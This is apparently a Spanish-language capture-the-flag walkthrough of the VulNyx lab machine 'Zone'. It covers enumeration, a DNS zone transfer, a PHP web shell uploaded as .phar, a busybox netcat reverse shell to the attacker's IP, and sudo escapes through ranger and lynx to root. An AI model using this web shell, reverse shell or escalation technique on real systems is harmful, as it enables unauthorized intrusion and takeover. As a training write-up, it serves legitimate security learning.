VulNyx - Zone
Information
Zone es una máquina virtual vulnerable Linux de dificultad fácil de la plataforma VulNyx, fue creada por el usuario d4t4s3c y funciona correctamente en los hipervisores VirtualBox y VMware.
Enumeration
Nmap
TCP
❯ nmap -n -Pn -sS -p- --min-rate 5000 192.168.1.113
Starting Nmap 7.95 ( https://nmap.org ) at 2025-09-21 09:33 CEST
Nmap scan report for 192.168.1.113
Host is up (0.000064s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
53/tcp open domain
80/tcp open http
❯ nmap -sVC -p22,53,80 192.168.1.113
Starting Nmap 7.95 ( https://nmap.org ) at 2025-09-21 09:33 CEST
Nmap scan report for 192.168.1.113
Host is up (0.00044s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 f7:ea:48:1a:a3:46:0b:bd:ac:47:73:e8:78:25:af:42 (RSA)
| 256 2e:41:ca:86:1c:73:ca:de:ed:b8:74:af:d2:06:5c:68 (ECDSA)
|_ 256 33:6e:a2:58:1c:5e:37:e1:98:8c:44:b1:1c:36:6d:75 (ED25519)
53/tcp open domain Eero device dnsd
| dns-nsid:
|_ bind.version: not currently available
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Apache2 Debian Default Page: It works
Shell (www-data)
80/TCP (HTTP)
Site (/)
Directory Brute Force
❯ gobuster dir -w /opt/directory-list-2.3-medium.txt -u http://192.168.1.113/ -x html,txt,php
===============================================================
Gobuster v3.8
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.1.113/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /opt/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.8
[+] Extensions: html,txt,php
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.html (Status: 200) [Size: 10700]
/robots.txt (Status: 200) [Size: 67]
Progress: 882176 / 882176 (100.00%)
===============================================================
Finished
===============================================================
Site (/robots.txt)
Encuentro el dominio securezone.nyx en el archivo robots.txt y lo agrego a mi archivo /etc/hosts para futuros ataques
❯ curl -sX GET "http://192.168.1.113/robots.txt"
User-agent: *
Allow: /
Sitemap: http://securezone.nyx/sitemap.xml
VHOST Site (securezone.nyx/)
Al acceder desde el dominio, observo que el contenido no cambia y es el mismo que cuando accedo desde la dirección IP
53/TCP (DNS)
Zone Transfer (AXFR)
Obtengo varios subdominios que también agrego a mi archivo /etc/hosts
❯ dig axfr securezone.nyx @192.168.1.113
; <<>> DiG 9.20.11-4+b1-Debian <<>> axfr securezone.nyx @192.168.1.113
;; global options: +cmd
securezone.nyx. 604800 IN SOA ns1.securezone.nyx. root.securezone.nyx. 2 604800 86400 2419200 604800
securezone.nyx. 604800 IN NS ns1.securezone.nyx.
admin.securezone.nyx. 604800 IN A 127.0.0.1
ns1.securezone.nyx. 604800 IN A 127.0.0.1
upl0ads.securezone.nyx. 604800 IN A 127.0.0.1
www.securezone.nyx. 604800 IN A 127.0.0.1
securezone.nyx. 604800 IN SOA ns1.securezone.nyx. root.securezone.nyx. 2 604800 86400 2419200 604800
;; Query time: 0 msec
;; SERVER: 192.168.1.113#53(192.168.1.113) (TCP)
;; WHEN: Sun Sep 21 09:52:11 CEST 2025
;; XFR size: 7 records (messages 1, bytes 248)
❯ dig axfr securezone.nyx @192.168.1.113 | awk '/IN/ {sub(/\.$/,"",$1); print $1}' | sort -u
admin.securezone.nyx
ns1.securezone.nyx
securezone.nyx
upl0ads.securezone.nyx
www.securezone.nyx
80/TCP (HTTP)
VHOST Site (upl0ads.securezone.nyx/)
Vuelvo al sitio web pero ahora desde el subdominio upl0ads.securezone.nyx y encuentro un file upload
Insecure File Upload
Upload PHP File
Antes de usar el Intruder de Burp Suite, me gusta realizar un tanteo manual con las extensiones típicas
❯ for i in php5 phtml phar ; do echo -n '<?php system($_GET["cmd"]); ?>' > cmd.$i ; done
❯ ls -l
.rw-r--r-- root root 30 B Sun Sep 21 10:01:21 2025 cmd.phar
.rw-r--r-- root root 30 B Sun Sep 21 10:01:21 2025 cmd.php5
.rw-r--r-- root root 30 B Sun Sep 21 10:01:21 2025 cmd.phtml
Obtengo éxito con la extensión .phar y esto me permite la subida de archivo
Directory Brute Force
Mediante fuzzing, obtengo la ruta /uploads, que posiblemente sea la que almacena las subidas de archivos
❯ gobuster dir -w /opt/directory-list-2.3-medium.txt -u http://upl0ads.securezone.nyx/ -x html,txt,php
===============================================================
Gobuster v3.8
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://upl0ads.securezone.nyx/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /opt/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.8
[+] Extensions: txt,php,html
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.php (Status: 200) [Size: 525]
/uploads (Status: 301) [Size: 334] [--> http://upl0ads.securezone.nyx/uploads/]
/css (Status: 301) [Size: 330] [--> http://upl0ads.securezone.nyx/css/]
Progress: 882176 / 882176 (100.00%)
===============================================================
Finished
===============================================================
Reverse Shell
Consigo ejecutar comandos como usuario www-data
❯ curl -sX GET "http://upl0ads.securezone.nyx/uploads/cmd.phar?cmd=id"
uid=33(www-data) gid=33(www-data) groups=33(www-data)
Ya ejecutando comandos intento obtener una reverse shell
❯ echo -n 'busybox nc 192.168.1.5 443 -e /bin/sh' | jq -sRr @uri
busybox%20nc%20192.168.1.5%20443%20-e%20%2Fbin%2Fsh
❯ curl -sX GET "http://upl0ads.securezone.nyx/uploads/cmd.phar?cmd=busybox%20nc%20192.168.1.5%20443%20-e%20%2Fbin%2Fsh"
Obtengo la shell como usuario www-data
❯ nc -lvnp 443
listening on [any] 443 ...
connect to [192.168.1.5] from (UNKNOWN) [192.168.1.113] 32958
id ; hostname
uid=33(www-data) gid=33(www-data) groups=33(www-data)
zone
Shell (hans)
Enumeration
Sudo
El usuario www-data puede ejecutar como hans el binario ranger con sudo
www-data@zone:/$ sudo -l
Matching Defaults entries for www-data on zone:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User www-data may run the following commands on zone:
(hans) NOPASSWD: /usr/bin/ranger
Abuse
En el man de ranger se observa que con ! permite ejecutar comandos externos
! - Open the console with the content “shell “ so you can quickly run commands
Me convierto en usuario hans abusando del privilegio
www-data@zone:/$ sudo -u hans /usr/bin/ranger
!
:shell /bin/bash
hans@zone:~$ id ; hostname
uid=1000(hans) gid=1000(hans) groups=1000(hans)
zone
Privilege Escalation
Enumeration
Sudo
El usuario hans puede ejecutar como root el binario lynx con sudo
hans@zone:~$ sudo -l
Matching Defaults entries for hans on zone:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User hans may run the following commands on zone:
(root) NOPASSWD: /usr/bin/lynx
Abuse
hans@zone:~$ sudo -u root /usr/bin/lynx
Una vez abierto lynx presiono ! y me convierto en usuario root
root@zone:/home/hans# id ; hostname
uid=0(root) gid=0(root) groups=0(root)
zone
Flags
Ya como usuario root puedo leer las flags user.txt y root.txt
root@zone:~# find / -name user.txt -o -name root.txt 2>/dev/null |xargs cat
da9*****************************
63b*****************************
Hasta aquí la resolución de la máquina Zone.
Happy Hacking!